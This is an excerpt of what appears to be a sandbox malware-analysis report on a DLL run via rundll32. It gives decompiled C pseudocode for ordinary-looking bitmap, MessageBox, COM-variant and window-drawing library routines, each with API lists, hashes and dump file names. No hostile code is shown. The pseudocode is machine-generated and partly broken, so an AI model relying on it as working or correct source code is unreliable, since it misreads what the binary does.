				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

APIs

LoadResource.KERNEL32(?,?), ref: 1002B5A3
LockResource.KERNEL32(00000000), ref: 1002B5B6
GetSysColor.USER32(00000000), ref: 1002B635
GetSysColor.USER32(00000000), ref: 1002B643
GetSysColor.USER32(00000000), ref: 1002B658
GetDC.USER32(00000000), ref: 1002B68A
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
SelectObject.GDI32(00000000,?), ref: 1002B6B8
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
DeleteDC.GDI32(00000000), ref: 1002B6F4
ReleaseDC.USER32 ref: 1002B6FF
FreeResource.KERNEL32(00000000), ref: 1002B70F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
String ID:
API String ID: 2552574679-0
Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60

Uniqueness

Uniqueness Score: -1.00%

Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}

APIs

LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96

Strings

user32.dll, xrefs: 10019D30
GetActiveWindow, xrefs: 10019D5C
MessageBoxA, xrefs: 10019D4B
GetLastActivePopup, xrefs: 10019D64
GetProcessWindowStation, xrefs: 10019D90
GetUserObjectInformationA, xrefs: 10019D7F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}

APIs

__EH_prolog.LIBCMT ref: 10039B2B
lstrlenA.KERNEL32(?,?,?), ref: 10039B65
VariantClear.OLEAUT32(?), ref: 10039DF8
VariantClear.OLEAUT32(?), ref: 10039E1F
SysFreeString.OLEAUT32(?), ref: 10039E83
SysFreeString.OLEAUT32(?), ref: 10039E98
SysFreeString.OLEAUT32(?), ref: 10039EAD
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
VariantClear.OLEAUT32(?), ref: 10039EF5

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
String ID:
API String ID: 344392101-0
Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}

APIs

__EH_prolog.LIBCMT ref: 10033FD3

Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3

CopyRect.USER32 ref: 10034012
InflateRect.USER32(?,?,?), ref: 10034028
IntersectRect.USER32 ref: 10034036
CreateRectRgnIndirect.GDI32(?), ref: 10034040
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053

Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
CopyRect.USER32 ref: 100340CC
InflateRect.USER32(?,?,?), ref: 100340E2
IntersectRect.USER32 ref: 100340F0
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126

Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B

Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
